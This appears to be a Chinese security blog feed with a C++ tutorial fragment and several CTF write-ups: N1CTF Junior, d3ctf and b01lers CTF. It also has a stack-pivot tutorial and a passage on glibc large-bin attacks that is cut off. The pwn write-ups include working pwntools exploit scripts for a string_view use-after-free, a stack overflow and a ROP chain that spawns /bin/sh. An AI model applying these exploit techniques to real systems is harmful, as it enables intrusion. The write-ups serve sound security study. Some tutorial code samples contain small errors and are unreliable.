需要注意的是,一个类默认有自己的无参构造函数。如果我们不希望它存在,可以通过explicit关键字声明我们重载的构造函数,从而屏蔽无参构造函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
class apple1 {
public:
    apple1(int size) {
        this->size=size;
    }
private:
    int size;
};
class apple2 {
public:
    explicit apple2(int size) {
        this->size=size;
    }
private:
    int size;
};
int main(){
    apple2 foo1(3); //在变量后加括号表示调用它的构造函数。这条语句是合法的
    apple1 foo2; //不加括号也会隐式调用无参构造函数。这条语句是合法的
    apple2 foo3; //编译错误,因为apple2类不存在无参构造函数
return 0;
}

在构造函数中,我们常常需要将传入的参数赋值给对象成员,C++为我们提供了这样的简便写法

1
2
3
4
5
6
class apple {
public:
    explicit apple(int s) : size(s) {} //大括号中为构造函数体,此处我们不需要进行其他操作所以为空
private:
    int size;
};

另外,我们也可以在类的声明中为其成员赋初值。这样在初始化类的实例,调用构造函数时,成员会首先被赋值。

1
2
3
4
5
class book{
public:
    std::string title = "default_title";
    std::string content;
};

在book类被初始化时,title成员被赋值”default_title”,而content成员则是调用std::string的无参构造函数后得到的std::string对象。注意此处没有显式为content赋值,但仍会调用std::string的构造函数,这与上面我们声明对象变量时(如apple foo;)相似。

析构函数

当一个对象离开它的作用域时,或手动释放对象时,对象要被销毁。销毁对应的函数就是析构函数(destructor)。析构函数不接受参数,没有返回值,名称为~类名。在析构函数中,我们应该释放对象之前显式申请的内存资源(例如malloc得到的内存),执行销毁时的特定逻辑。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class book {
public:
    book() {
        title=malloc(256);
        content=malloc(256);
    }
    ~book() {
        free(title);
        free(content);
    }
private:
    char* title = nullptr;
    char* content = nullptr;
};

在对象析构时,如果对象成员也是对象(不包括对象指针或引用),那么成员对象也会被析构。

对于有继承关系的类,因为多态,在delete对象指针时,对象的实际类型可能不是指针对应的类型

1
2
fruit* f = new apple();
delete f; //f实际上指向apple对象

而基类和子类的析构逻辑很可能是不一样的,因此对于有继承关系的类,我们应该使用虚析构函数。

1
2
3
4
5
6
7
8
9
class fruit {
public:
    fruit() = default; //赋值为default即使用默认的函数
    virtual ~fruit() = default;
};
class apple : public fruit {
public:
    ~fruit() override = default;
};

此时再回想构造函数,因为在构造对象时,对象的类型一定是确定的,不存在多态,所以构造函数一定不是虚函数。

拷贝构造函数

与构造函数类似,但只接受一个当前类的常量左值引用的构造函数称为拷贝构造函数(copy constructor)。

1
2
3
4
class foo {
public:
foo(const foo& f) = default; //拷贝构造函数
};

除了像构造函数一样使用外,在对象发生拷贝时(例如函数传参将对象值传递,或是将一个对象赋值给另一个同类型对象),拷贝构造函数会被调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
class foo {
public:
foo(const foo& f) = default; //拷贝构造函数
};
void bar(foo f) {
    // f是传递过来的参数经拷贝得到的
}
int main(){
    foo f1;
    foo f2=f1; //拷贝
    foo f3(f1); //像调用构造函数一样调用拷贝构造函数
    bar(f1); //值传递时拷贝
}

移动语义与移动构造函数

在实践中,我们常常遇到一些“所有权转移”的问题。假如我实现了一个字符串类mystring,现在要将两个mystring类型变量的值互换:

1
2
3
4
mystring a,b;
mystring tmp=a;
a=b;
b=tmp;

在这样的过程中进行了额外的拷贝(tmp拷贝a,a拷贝b,b拷贝tmp),在一些情况下会造成比较大的性能损失。我们原本要实现的并不是拷贝,而只是移动。因此引入了移动语义std::move(位于头文件utility)

std::move将变量的类型强制转换为右值引用,此时再进行赋值会调用对象的移动构造函数:

1
2
3
4
class mystring {
public:
    mystring(mystring&& s) = default; //移动构造函数
};

此时我们交换两变量就可以写成

1
2
3
4
mystring a,b;
mystring tmp=std::move(a);               
a=std::move(b);
b=std::move(tmp);

经过move后,原先的变量存储的实例不应再被使用。此时再访问a的成员属于未定义行为。

需要注意的是,std::move并不实际上移动对象内部的值,而是交由移动构造函数处理。在声明了拷贝构造函数而未声明移动构造函数的情况下,会默认调用拷贝构造函数。移动的具体行为是由移动构造函数定义的,并不一定会带来性能上的提升,而是取决于具体实现。

我们可以通过以下的例子感受std::string的移动

1
2
3
4
5
6
7
8
9
10
11
#include<string>
#include<cstdio>
using namespace std;
int main(){
    string a("gfjerajgoiraheogehwofiewjiwihgerihgeioafheoifjowejgoidoqwi"); //因为短字符串优化机制会影响字符串存储的位置,此处应为较长的字符串
    printf("%p\n",a.c_str());
    string b=a;
    string c=std::move(a);
    printf("%p\n%p\n",b.c_str(),c.c_str());
    return 0;
}

我们注意到a存储字符串的位置,与a移动到c后存储字符串的位置相同,体现了移动。而b是由a拷贝而得,在堆上申请了内存,因此在仅需要移动的情况下使用拷贝会带来性能损失。

友元类与友元函数

运算符重载

强制类型转换

在C++中,我们仍然可以使用C风格的强制类型转换

1
char* ptr = (char*)malloc(256);

然而,在一些场景下,这样“简单直观”的类型转换会带来难以察觉的问题。因此,C++引入了4种强制类型转换

const_cast

const_cast用于将常量引用/指针转为非常量引用/指针,从而使其可写。注意这只是进行了类型转换,如果指针指向的位置本来就不可写,如果进行转换,即便通过了编译,在运行时也会出现问题。

1
2
3
4
5
6
7
8
int main(){
const char* p1 = "hello world!";
    char arr[15]="hello world!";
    const char* p2 = arr;
    const_cast<char*>(p1)[0]='a'; //p1对应的字符串存储在常量区,不可被修改。转换不合法
    const_cast<char*>(p2)[0]='a'; //p2指向可写的内存,可以被修改,因此转换合法
    return 0;
}

static_cast

static_cast用于进行一些数值类型上的转换(如有符号/无符号 长/短 整型/浮点数),和类的强制转换(要求重载强制转换运算符)。

dynamic_cast

dynamic_cast用于有继承关系的类之间的转换,转换发生在运行时,程序会根据对象的类型信息进行判断。若对象指针之间的转换不成功,会得到空指针;若对象引用之间的转换不成功,会抛出std::bad_cast异常。

reinterpret_cast

多继承与菱形继承问题

Itanium ABI中的对象内存模型

常用STL

std::string

std::vector

智能指针

]]> cpp与面向对象编程入门教程,推荐阅读前有C语言基础、会一点C++语法 N1CTF Junior 2023 pwn 顶级签到 赛题复现 https://zqy.ink/2023/05/12/dingjiqiandao/ 2023-05-12T15:36:52.000Z 2025-11-14T08:20:36.879Z 前言

之前还不会C++的时候对着源码冥思苦想,也没看出来哪有问题。现在似乎有了一点头绪。

源码分析

因为题目给了源码所以直接看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#include <iostream>
#include <string>
#include <vector>
#include <exception>
#include <string_view>
#include <unordered_map>
#include <functional>
using namespace std;

string getInput()
{
    string res;
    getline(cin, res);
    if (res.size() > 64)
        throw std::runtime_error("Invalid input");
    while (!res.empty() && res.back() == '\n')
        res.pop_back();
    return res;
}
bool allow_admin = false;
auto splitToken(string_view str, string_view delim)
{
    if (!allow_admin && str.find("admin") != str.npos)
        throw std::invalid_argument("Access denied");
    vector<string_view> res;
    size_t prev = 0, pos = 0;
    do
    {
        pos = str.find(delim, prev);
        if (pos == std::string::npos)
        {
            pos = str.length();
        }
        res.push_back(str.substr(prev, pos - prev));
        prev = pos + delim.length();
    } while (pos < str.length() && prev < str.length());
    return res;
}
auto parseUser()
{
    auto tok_ring = splitToken(getInput(), ":");
    if (tok_ring.size() != 2)
        throw std::invalid_argument("Bad login token");
    if (tok_ring[0].size() < 4 || tok_ring[0].size() > 16)
        throw std::invalid_argument("Bad login name");
    if (tok_ring[1].size() > 32)
        throw std::invalid_argument("Bad login password");
    return make_pair(tok_ring[0], tok_ring[1]);
}
const unordered_map<string_view, function<void(string_view)>> handle_admin = {
    {"admin", [](auto)
     {
         system("/readflag");
     }},
    {"?", [](auto)
     {
         cout << "Enjoy :)" << endl;
         cout << "https://www.bilibili.com/video/BV1Nx411S7VG" << endl;
     }}};
constexpr auto handle_guest = [](auto)
{
    cout << "Hello guest!" << endl;
};
int main()
{
    auto [username, password] = parseUser();
    cout << "Enter 'login' to continue, or enter 'quit' to cancel." << endl;
    auto choice = getInput();
    if (choice == "quit")
    {
        cout << "bye" << endl;
        return 0;
    }
    if (auto it = handle_admin.find(username); it != handle_admin.end())
    {
        it->second(password);
    }
    else
    {
        handle_guest(password);
    }
}

代码粗看似乎没有逻辑上的问题,但是注意到使用了string_view,这是一个指向字符串的类型,自己并不拥有字符串数据,因此生命周期必须小于等于拥有的字符串,否则就会造成UAF。我们注意到parseUser函数返回pair<string_view,string_view>类型,而string_view对应的字符串在splitToken函数处返回,在main函数中显然已被析构。因此在main函数中得到的username, password构成UAF。

利用思路

在main函数中,只要choice不为”quit”就视为login,因此我们可以使choice字符串覆盖原先的username:password字符串,实现readflag。

对于较短字符串来说,因为SSO(Short String Optimization)机制(这篇回答给出了比较详细的解释),字符串被存储在对象内部,无法完成漏洞利用。

对于较长字符串而言,std::basic_string会在堆上开辟空间存储字符串,因此很容易想到使第二次输入的字符串长度等于第一次,从而复用第一次开辟的堆空间。需要注意的是,username是string_view类型,存储了字符串切片的长度,因此在第一次输入时,username必须是5个字符长度。

exp

1
2
3
4
5
from pwn import *
p=process('./chall')
p.sendline(b'aaaaa:'+b'a'*32)
p.sendlineafter(b'cancel',b'admin'+b'a'*33)
p.interactive()
]]> N1CTF Junior 2023 pwn 顶级签到 赛题复现 by 没有头猪 (d3ctf)d3syscall赛题复现 https://zqy.ink/2023/05/07/d3syscall/ 2023-05-07T17:08:42.000Z 2025-11-14T08:20:36.883Z 程序逻辑分析

先打开d3syscall文件,发现.init_array的初始化函数中释放了my_module文件,查找了kallsyms中的sys_call_table地址,并将其作为参数magic初始化内核模块my_module。

dump下来my_module进行分析

在init_module中,程序先保存了0x14f-0x153处的sys_call_table内容(至于为什么没有0x154…我只能猜是出题人忘了),保存cr0,然后更改cr0寄存器的bit16为0(WP写保护位)使sys_call_table所在的内存页可写,劫持0x14f-0x154的syscall为模块内部的函数,最后还原cr0。

由此我们分析若干syscall handler,分析过程中要注意传入syscall的参数rdi, rsi, rdx等被放置在了栈上,rdi指向栈的一个位置,因此handler一开始取[rdi+xxh]值的操作就是在找参数。通过简单的分析很好猜出来对应关系,或者搜一下__fentry__/找找内核实现/内核调试应该也能出。

分析可知模块内部实现了一个简单的vm,syscall number对应操作如下:

14fh: mov

150h: 算术运算

151h: push

152h: pop

153h: 清空寄存器

154h: 检查栈上内容是否符合要求

假设vm的四个通用寄存器为r0-r3,分析sub_13f5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
mov r0, rdi
mov r1, rsi
push r1
mov r2, r0
mov r1, 3
shl r2, r1
mov r1, 0x51e7647e
add r2, r1
mov r3, r0
mov r1, 3
mul r3, r1
mov r1, 0xe0b4140a
add r3, r1
xor r2, r3
mov r3, r0
mov r1, 0xe6978f27
add r3, r1
xor r2, r3
pop r1
add r1, r2
push r1
push r0
mov r2, r1
mov r0, 6
shl r2, r0
mov r0, 0x53a35337
add r2, r0
mov r3, r1
mov r0, 5
mul r3, r0
mov r0, 0x9840294d
add r3, r0
xor r2, r3
mov r3, r1
mov r0, 0x5eae4751
sub r3, r0
xor r2, r3
pop r0
add r0, r2
push r0
clear r0, r1, r2, r3

肉眼翻译为C代码

1
2
3
4
5
6
void sub_13f5(__int64 x, __int64 y){
    __int64 tmp1 = y+(((x<<3)+0x51e7647e)^(x*3+0xe0b4140a)^(x+0xe6978f27));
    push(tmp1);
    __int64 tmp2 = x+(((tmp1<<6)+0x53a35337)^(tmp1*5+0x9840294d)^(tmp1-0x5eae4751));
    push(tmp2);
}

所以可以通过栈上的tmp1, tmp2值和计算出x,再由tmp1和x计算出y

解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import long_to_bytes
def calc(tmp1, tmp2):
    x = tmp2-c_uint64(((tmp1<<6)+0x53a35337)^(tmp1*5+0x9840294d)^(tmp1-0x5eae4751)).value
    x = c_uint64(x).value
    y = tmp1-c_uint64((((x<<3)+0x51e7647e)^(x*3+0xe0b4140a)^(x+0xe6978f27))).value
    y = c_uint64(y).value
    return long_to_bytes(x)[::-1]+long_to_bytes(y)[::-1]

result=b''
result+=calc(0xB0800699CB89CC89,0x4764FD523FA00B19)
result+=calc(0x396A7E6DF099D700,0xB115D56BCDEAF50A)
result+=calc(0x2521513C985791F4,0xB03C06AF93AD0BE)
print(result)
]]> (d3ctf)d3syscall赛题复现 by 没有头猪 b01lersCTF2023 pwn cfifufuuufuuuuu赛题复现 https://zqy.ink/2023/04/03/cfifufuuufuuuuu/ 2023-04-03T16:00:00.000Z 2025-11-14T08:20:36.879Z 这题…虽然有点新意,但是从头到尾给人的感觉都太过刻意,建议改为reverse题(bushi

题目分析

拿到手两个文件:loader.pyc和二进制文件s;判断是通过loader.pyc加载二进制文件s打开的程序。

loader.pyc

使用uncompyle6反编译(这里有个坑,使用pycdc出来的结果跑不起来)。在得到的代码中有一些乱码,user_regs_struct中的值我们可以对照glibc源码文件(glibc/sysdeps/unix/sysv/linux/x86/sys/user.h)进行修改。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
# uncompyle6 version 3.7.3
# Python bytecode 3.6 (3379)
import struct, random, string, subprocess, os, sys, hashlib
from collections import defaultdict
import resource
PTRACE_TRACEME = 0
PTRACE_PEEKTEXT = 1
PTRACE_PEEKDATA = 2
PTRACE_PEEKUSER = 3
PTRACE_POKETEXT = 4
PTRACE_POKEDATA = 5
PTRACE_POKEUSER = 6
PTRACE_CONT = 7
PTRACE_KILL = 8
PTRACE_SINGLESTEP = 9
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_GETFPREGS = 14
PTRACE_SETFPREGS = 15
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
PTRACE_GETFPXREGS = 18
PTRACE_SETFPXREGS = 19
PTRACE_SYSCALL = 24
PTRACE_SETOPTIONS = 16896
PTRACE_GETEVENTMSG = 16897
PTRACE_GETSIGINFO = 16898
PTRACE_SETSIGINFO = 16899
PTRACE_LISTEN = 16904
PTRACE_O_TRACESYSGOOD = 1
PTRACE_O_TRACEFORK = 2
PTRACE_O_TRACEVFORK = 4
PTRACE_O_TRACECLONE = 8
PTRACE_O_TRACEEXEC = 16
PTRACE_O_TRACEVFORKDONE = 32
PTRACE_O_TRACEEXIT = 64
PTRACE_O_MASK = 127
PTRACE_O_TRACESECCOMP = 128
PTRACE_O_EXITKILL = 1048576
PTRACE_O_SUSPEND_SECCOMP = 2097152
PTRACE_SEIZE = 16902
import ctypes
from ctypes import *
from ctypes import get_errno, cdll
from ctypes.util import find_library

class user_regs_struct(Structure):
    _fields_ = (
     ('r15', c_ulong),
     ('r14', c_ulong),
     ('r13', c_ulong),
     ('r12', c_ulong),
     ('rbp', c_ulong),
     ('rbx', c_ulong),
     ('r11', c_ulong),
     ('r10', c_ulong),
     ('r9', c_ulong),
     ('r8', c_ulong),
     ('rax', c_ulong),
     ('rcx', c_ulong),
     ('rdx', c_ulong),
     ('rsi', c_ulong),
     ('rdi', c_ulong),
     ('oax', c_ulong),
     ('rip', c_ulong),
     ('cs', c_ulong),
     ('eflags', c_ulong),
     ('rsp', c_ulong),
     ('ss', c_ulong),
     ('fs_base', c_ulong),
     ('gs_base', c_ulong),
     ('ds', c_ulong),
     ('es', c_ulong),
     ('fs', c_ulong),
     ('gs', c_ulong))


libc = CDLL('libc.so.6', use_errno=True)
ptrace = libc.ptrace
ptrace.argtypes = [c_uint, c_uint, c_long, c_long]
ptrace.restype = c_long

def mem_read(pid, pos=-1, tlen=8):
    fd = os.open('/proc/%d/mem' % pid, os.O_RDONLY)
    if pos >= 0:
        os.lseek(fd, pos, 0)
    buf = b''
    while 1:
        cd = os.read(fd, tlen - len(buf))
        if cd == b'':
            break
        buf += cd
        if len(buf) == tlen:
            break

    os.close(fd)
    return buf


def pkiller():
    from ctypes import cdll
    import ctypes
    cdll['libc.so.6'].prctl(1, 9)


def pnx(status):

    def num_to_sig(num):
        sigs = [
         'SIGHUP', 'SIGINT', 'SIGQUIT', 'SIGILL', 'SIGTRAP', 'SIGABRT', 'SIGBUS', 'SIGFPE', 'SIGKILL', 'SIGUSR1', 'SIGSEGV', 'SIGUSR2', 'SIGPIPE', 'SIGALRM', 'SIGTERM', 'SIGSTKFLT', 'SIGCHLD', 'SIGCONT', 'SIGSTOP', 'SIGTSTP', 'SIGTTIN', 'SIGTTOU', 'SIGURG', 'SIGXCPU', 'SIGXFSZ', 'SIGVTALRM', 'SIGPROF', 'SIGWINCH', 'SIGIO', 'SIGPWR', 'SIGSYS']
        if num - 1 < len(sigs):
            return sigs[(num - 1)]
        else:
            return hex(num)[2:]

    status_list = []
    status_list.append(hex(status))
    ff = [os.WCOREDUMP, os.WIFSTOPPED, os.WIFSIGNALED, os.WIFEXITED, os.WIFCONTINUED]
    for f in ff:
        if f(status):
            status_list.append(f.__name__)
            break
    else:
        status_list.append('')

    status_list.append(num_to_sig(status >> 8 & 255))
    ss = (status & 16711680) >> 16
    ptrace_sigs = ['PTRACE_EVENT_FORK', 'PTRACE_EVENT_VFORK', 'PTRACE_EVENT_CLONE', 'PTRACE_EVENT_EXEC', 'PTRACE_EVENT_VFORK_DONE', 'PTRACE_EVENT_EXIT', 'PTRACE_EVENT_SECCOMP']
    if ss >= 1:
        if ss - 1 <= len(ptrace_sigs):
            status_list.append(ptrace_sigs[(ss - 1)])
    else:
        status_list.append(hex(ss)[2:])
    return status_list


def main():
    pipe = subprocess.PIPE
    fullargs = ['./s']
    p = subprocess.Popen(fullargs, close_fds=True, preexec_fn=pkiller)
    pid = p.pid
    opid = pid
    pid, status = os.waitpid(-1, 0)
    ptrace(PTRACE_SETOPTIONS, pid, 0, PTRACE_O_TRACESECCOMP | PTRACE_O_EXITKILL | PTRACE_O_TRACECLONE | PTRACE_O_TRACEVFORK)
    ptrace(PTRACE_CONT, pid, 0, 0)
    SXX = set()
    regs = user_regs_struct()
    while True:
        pid, status = os.waitpid(-1, 0)
        ssy = pnx(status)
        if ssy[1] == 'WIFEXITED':
            break
        if ssy[2] == 'SIGSEGV':
            break
        if ssy[2] == 'SIGTRAP':
            res = ptrace(PTRACE_GETREGS, pid, 0, ctypes.addressof(regs))
            nn = mem_read(pid, regs.rip, 1)[0]
            if nn == 0x48:
                regs.rax = regs.rdi
                regs.rdi = regs.rsi
                ptrace(PTRACE_SETREGS, pid, 0, ctypes.addressof(regs))
            else:
                if nn == 0x11 or nn == 0x21 or nn == 0x31:
                    offd = {17:0,  33:40,  49:72}
                    vv = mem_read(pid, regs.rsp + offd[nn], 8)
                    vv = struct.unpack('<Q', vv)[0]
                    SXX.add(vv)
                    regs.rip += 1
                    ptrace(PTRACE_SETREGS, pid, 0, ctypes.addressof(regs))
                elif nn == 0x12 or nn == 0x22 or nn == 0x32:
                    offd = {18:0,  34:40,  50:72}
                    vv = mem_read(pid, regs.rsp + offd[nn], 8)
                    vv = struct.unpack('<Q', vv)[0]
                    if vv not in SXX:
                        print('\n\n!!!Stack Violation Detected!!!\n\n')
                        regs.rip = 0
                        ptrace(PTRACE_SETREGS, pid, 0, ctypes.addressof(regs))
                        break
                    SXX.remove(vv)
                    regs.rip += 1
                    ptrace(PTRACE_SETREGS, pid, 0, ctypes.addressof(regs))
        res = ptrace(PTRACE_CONT, pid, 0, 0)

    try:
        p.kill()
    except OSError:
        pass

    while 1:
        try:
            pid, status = os.waitpid(-1, 0)
            ssy = pnx(status)
        except ChildProcessError:
            break


if __name__ == '__main__':
    sys.exit(main())

通过分析loader和二进制文件,我们可以发现二进制文件中含有kill, int 3和部分花指令,为我们的调试增加了难度。

loader是通过ptrace到s上进行运行的,主要的工作是:

  • 程序kill自己后,使程序继续运行
  • 遇到int 3后,检查之后的字节,若为0x48(出现在syscall前),更改部分寄存器值
  • int 3后的字节若为0x11, 0x21, 0x31,存储栈上对应位置的值,存入集合中
  • int 3后的字节若为0x12, 0x22, 0x32,读取栈上对应位置的值,检查其是否在集合中,若不存在则终止程序,提示Stack Violation Detected;若存在则从集合中移除这个值,继续程序

由此可见,loader除了用于反调试之外,最重要的是通过程序中的花指令自行实现了一个stack canary。经过下面的分析,stack canary为retn addr。

s

逻辑分析

程序在启动时将文件名“/dev/urandom”拷贝进0x601084的位置。将dword_601000作为ptr,初始值为0,在sub_400362函数中进行了读取数据、打开文件、读取文件、关闭的操作:

1
2
3
4
5
read_chars((char *)&dword_601000[4 * dword_601000[0] + 1], 0LL, 16LL);
++dword_601000[0];
v0 = open((__int64)&dword_601000[33]);
read_chars((char *)&dword_601000[4 * dword_601000[0] + 1], v0, 16LL);
close(v0);

可见其为将读取/dev/urandom得到的数据作为key对数据进行异或并输出的过程。

然后程序在sub_400486函数中读取用户输入的数据和key并进行异或输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void sub_400486()
{
  __int64 i; // rbx
  char arg2; // [rsp+Fh] [rbp-39h] BYREF
  _BYTE buf[16]; // [rsp+10h] [rbp-38h] BYREF
  char v3[40]; // [rsp+20h] [rbp-28h] BYREF

  print("Your data to decrypt?:\n");
  read_chars(v3, 0LL, 16LL);
  print("Your key?:\n");
  readuntil((__int64)buf, 0LL, '\n');
  print("Your decrypted data:\n");
  for ( i = 0LL; i != 16; ++i )
  {
    arg2 = buf[i] ^ v3[i];
    syscall(1LL, 1LL, (__int64)&arg2, 1LL);
  }
}

漏洞分析

显然0x4002ed处的函数存在漏洞,函数伪代码

1
2
3
4
5
6
7
8
9
10
void __fastcall readuntil(char *buf, __int64 fd, char c)
{
  do
  {
    if ( syscall(0LL, fd, (__int64)buf, 1LL) <= 0 )
      exit(5LL);
    ++buf;
  }
  while ( *(buf - 1) != c );
}

由于这个二进制文件使用寄存器的习惯与正常程序不同,我们需要仔细分析究竟可以溢出多少字节。寻找交叉引用得到sub_400486函数。(为方便调试程序,我patch了程序,注释中为patch前的内容)

sub_400486

注意到buf是在[rsp+10h]处开始读入,可以实现栈上任意长度的覆盖。然而canary在[rsp+48h]处,即retn addr处,这使我们不能轻易控制控制流。

注意到canary在loader脚本中是以set存储的,所以是无序的。此时我们观察set中的值,除去原本的canary之外只有一个值0x4005e2,即程序启动时调用sub_400524存储的canary,此时我们别无选择——覆盖retn addr为0x4005e2。

观察0x4005e2处的汇编代码

0x4005e2

若eax==1,则程序重新调用sub_400524,即实现了程序的循环运行。往前回溯,eax对应的是sub_400486函数中syscall(1,1,&arg2,1)的返回值,显然这里返回值必定为1,因此可以通过eax==1的判断。

程序循环执行时,++dword_601000的操作会被执行多次,即读入用户输入的缓冲区地址不断后移,我们可以通过多次循环使其移至存储文件名的位置,覆盖其为”flag.txt”,从而将flag作为key读入,泄露flag

exp

1
2
3
4
5
6
7
8
from pwn import *
r = process("./loader.py")
for i in range(9):
    print(i)
    r.sendafter('?:\n',b'flag.txt'.ljust(16,b'\x00'))
    r.sendafter(':\n',b'\x00'*16)
    r.sendline(b'\x00'*0x38+p64(0x4005e2))
r.interactive()

参考资料

https://blog.snwo.kr/posts/(ctf)-b01lers-ctf-2023/

]]> b01lersCTF2023 pwn cfifufuuufuuuuu赛题复现 by 没有头猪 栈迁移原理分析 https://zqy.ink/2023/03/21/pivot/ 2023-03-21T16:11:12.000Z 2025-11-14T08:20:36.931Z 栈迁移

背景

由于栈地址的随机化,有时利用缓冲区溢出进行多次ROP时不方便覆盖prev rbp位置的地址(假如覆盖的返回地址为函数中间,不包括push rbp; mov rbp,rsp;部分);或者更常遇到的是,我们输入的内容很多,然而真正溢出的部分很少,难以进行ROP的情况。我们希望用一种办法,使栈迁移至已知地址处,这就是栈迁移(stack pivot)攻击技术。

原理

在一个函数的结尾,通常有

1
2
leave
ret

指令,这是为了恢复之前保存的rbp寄存器,同时返回至原先的指令位置。其中leave相当于

1
2
mov rsp, rbp
pop rbp

这是很自然的,一个函数中,rbp常常不变(因为要作为栈底指针,便于寻找变量对应的内存位置),而rsp可能会改变(比如c99标准中引入的可变长数组特性)。无论被调用函数将栈开辟到哪个位置(即无论rsp指针指向哪里),leave都能将栈指针指向栈底,并且将栈底保存的原先的rbp地址pop给rbp,此时rsp+=8,rsp指向返回地址,再执行ret指令,返回至原先的位置。

那么考虑构造ROP链,使得连续执行两次leave,将栈安排如下:

1
2
3
4
[fake stack]                     <- prev rbp
[addr to leave;ret; instruction] <- retn addr
[fake rbp addr]                  <- prev rbp
[addr to next gadget]            <- retn addr

使用pop rip代替ret,用mov rsp,rbp;pop rbp;代替leave,可以如此展示程序流程

1
2
3
4
5
6
mov rsp,rbp
pop rbp      ;rbp=fake_stack
pop rip      ;这里伪造的retn addr为下一个leave;ret;
mov rsp,rbp  ;此时rsp=rbp,而rbp==fake_stack
pop rbp      ;rbp=fake_rbp
pop rip      ;返回至下一个gadget

由此,我们实现了对栈指针的劫持。

实战中,我们常将栈迁移至bss段后的位置,或堆上的位置。因为linux系统分配内存时,一个内存页的大小至少为0x1000,而bss段经常没有这么长,所以可以将栈劫持到(bss&~(0xfff))+0x900之类的位置上。

实践

VNCTF2023 traveler

程序中有system,直接两次栈迁移构造ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
context(arch='amd64',os='linux')
p=process('./traveler')
pop_rdi_ret=0x4012c3
leave_ret=0x401253
ret=0x40101a
fake_stack2=0x404900
msg=0x4040a0
system=0x401090
p.sendafter(b'\n',b'a'*0x20+p64(fake_stack2)+p64(0x40120a))
p.sendafter(b'\n',b'a')
p.sendafter(b'\n',p64(pop_rdi_ret)+p64(msg)+p64(system)+p64(0)+p64(0x4048d8)+p64(leave_ret))
p.sendafter(b'\n',b'/bin/sh\x00')
p.interactive()
]]> 本文将以x86_64架构为例,讲解栈迁移技术的原理与应用。 Large Bin Attack源码分析 https://zqy.ink/2023/03/07/Large_bin_attack/ 2023-03-07T16:22:17.000Z 2025-11-14T08:20:36.879Z 背景

在高版本glibc中,由于在Tcache, fastbin等位置引入了较严格的安全检查,很多低版本glibc中可以使用的攻击手法都难以利用。Large bin attack可以将任意位置覆盖一个可控堆地址,成为了有力的攻击手段。在取消各种hook的高版本glibc下,使用large bin attack进行fsop等攻击也成为了经典的攻击手段。

分析

当free掉一个chunk的时候,如果范围不在Tcache范围内,或Tcache已满且不在fastbin范围内,并且不与top chunk相邻,chunk会进入unsorted bin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
      */

bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
    malloc_printerr ("free(): corrupted unsorted chunks");
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
    p->fd_nextsize = NULL;
    p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);

只有在下一次malloc更大的chunk时,符合large bin大小的chunk才会被放入large bin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
    malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

/* Take now instead of binning if exact fit */

if (size == nb)
{
    /* ... */
}

/* place chunk in bin */

if (in_smallbin_range (size))
{
    /* ... */
}
else
{
    victim_index = largebin_index (size);
    bck = bin_at (av, victim_index);
    fwd = bck->fd;

    /* maintain large bins in sorted order */
    if (fwd != bck)
    {
        /* Or with inuse bit to speed comparisons */
        size |= PREV_INUSE;
        /* if smaller than smallest, bypass loop below */
        assert (chunk_main_arena (bck->bk));
        if ((unsigned long) (size)
            < (unsigned long) chunksize_nomask (bck->bk))
        {
            fwd = bck;
            bck = bck->bk;

            victim->fd_nextsize = fwd->fd;
            victim->bk_nextsize = fwd->fd->bk_nextsize;
            fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
        }
        else
        {
            assert (chunk_main_arena (fwd));
            while ((unsigned long) size < chunksize_nomask (fwd))
            {
                fwd = fwd->fd_nextsize;
                assert (chunk_main_arena (fwd));
            }

            if ((unsigned long) size
                == (unsigned long) chunksize_nomask (fwd))
                /* Always insert in the second position.  */
                fwd = fwd->fd;
            else
            {
                victim->fd_nextsize = fwd;
                victim->bk_nextsize = fwd->bk_nextsize;
                if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
                    malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
